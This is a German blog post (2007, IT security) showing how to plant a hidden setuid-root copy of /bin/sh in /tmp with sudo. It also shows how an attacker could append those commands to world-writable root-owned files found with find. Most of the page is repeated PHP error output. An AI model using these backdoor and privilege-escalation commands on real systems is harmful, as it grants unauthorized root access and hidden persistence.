Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
541
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
13
06
2007
Es ist zwar keine Schwachstelle, dennoch eine interessante Möglichkeit wie man sich eine Rootshell unter Ubuntu verschaffen kann. Hierzu muss einfach folgendes Script gestartet werden:
duddits@ubuntu:/home/duddits$ vi rs.sh
#!/bin/sh
sudo cp /bin/sh /tmp/.rs
sudo chmod 4755 /tmp/.rs
duddits@ubuntu:/home/duddits$ chmod 755 rs.sh
duddits@ubuntu:/home/duddits$ ./rs.sh
duddits@ubuntu:/home/duddits$ /tmp/.rs
# whoami
root
#
Je nach dem ob der Benutzer zuvor schon einmal sudo verwendet hatte, kann es beim Ausführen des Script zu einer Passwort-Frage kommen oder nicht. Wichtig ist vor allem das die UID und GID 0 sind, also das Besitzer und Gruppe die von Root sind von der Datei /tmp/.rs. Natürlich ist dafür nicht zwingend ein Script notwendig, es würde auch reichen die Befehle direkt am Kommando-Prompt abzusetzen. Für einen Angreifer ist dies natürlich uninteressant, da er ja das Passwort des Benutzers kennen müsste und könnte dann genauso gut auch einfach via
sudo su -
Root werden. Den einzigen Ansatz den ein Angreifer hier verfolgen könnte, wäre nach World Writable Files, also global beschreibbaren Dateien zu suchen, welche als Besitzer und als Gruppe
root haben und diesen dann die beiden Befehle hinzufügen:
duddits@gentoo:~ $ find / -type f \( -perm -7 -o -perm -70 \) -gid 0 -uid 0 -exec ls -lA {} \;
-rwxrwxrwx 1 root root 80500 2007-06-13 12:26 /home/evil
duddits@gentoo:~ $ echo cp /bin/sh /tmp/.rs >> /home/evil
duddits@gentoo:~ $ echo chmod 4755 /tmp/.rs >> /home/evil
Kommentare :
Noch keine Kommentare »
Kategorien : IT-Security
Trackbacks :
Keine Trackbacks »
Ansicht der Kommentare:
(
Linear | Verschachtelt)
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_comments.inc.php on line
292
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Kommentar schreiben
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
560
Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in
/www/htdocs/w0072ee3/blog/include/db/mysql.inc.php on line
270
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_config.inc.php on line
506
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::enum_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
951
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_s9ymarkup::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_s9ymarkup/serendipity_event_s9ymarkup.php on line
146
Strict Standards: Declaration of serendipity_event_s9ymarkup::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_s9ymarkup/serendipity_event_s9ymarkup.php on line
146
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_emoticate::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_emoticate/serendipity_event_emoticate.php on line
204
Strict Standards: Declaration of serendipity_event_emoticate::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_emoticate/serendipity_event_emoticate.php on line
204
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_nl2br::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_nl2br/serendipity_event_nl2br.php on line
162
Strict Standards: Declaration of serendipity_event_nl2br::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_nl2br/serendipity_event_nl2br.php on line
162
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_browsercompatibility::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_browsercompatibility/serendipity_event_browsercompatibility.php on line
80
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
469
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
494
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
538
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spamblock/serendipity_event_spamblock.php on line
902
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Declaration of serendipity_event_statistics::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_statistics/serendipity_event_statistics.php on line
1015
Strict Standards: Declaration of serendipity_event_statistics::uninstall() should be compatible with serendipity_plugin::uninstall(&$propbag) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_statistics/serendipity_event_statistics.php on line
1015
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
400
Deprecated: Assigning the return value of new by reference is deprecated in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
444
Strict Standards: Declaration of serendipity_event_spartacus::event_hook() should be compatible with serendipity_event::event_hook($event, &$bag, &$eventData, $addData = NULL) in
/www/htdocs/w0072ee3/blog/plugins/serendipity_event_spartacus/serendipity_event_spartacus.php on line
1183
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::load_plugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
958
Strict Standards: Non-static method serendipity_plugin_api::probePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
542
Strict Standards: Non-static method serendipity_plugin_api::getClassByInstanceID() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
492
Strict Standards: Non-static method serendipity_plugin_api::includePlugin() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
497
Strict Standards: Non-static method serendipity_plugin_api::get_plugin_title() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
962
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_config.inc.php on line
506
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/serendipity_config.inc.php on line
399
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
31
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::count_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
34
Strict Standards: Non-static method serendipity_plugin_api::count_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/genpage.inc.php on line
35
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
514
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
572
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
555
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
943
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
1026
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_entries.inc.php on line
1094
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_comments.inc.php on line
292
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Only variables should be assigned by reference in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
73
Strict Standards: Non-static method serendipity_plugin_api::hook_event() should not be called statically in
/www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line
541
Strict Standards: Non-static method serendipity_plugin_api::get_event_plugins() should not be called statically in
/www/htdocs/w0072ee3/blog/include/plugin_api.inc.php on line
1007
Trackbacks
Strict Standards: Only variables should be assigned by reference in /www/htdocs/w0072ee3/blog/include/functions_smarty.inc.php on line 73
Keine Trackbacks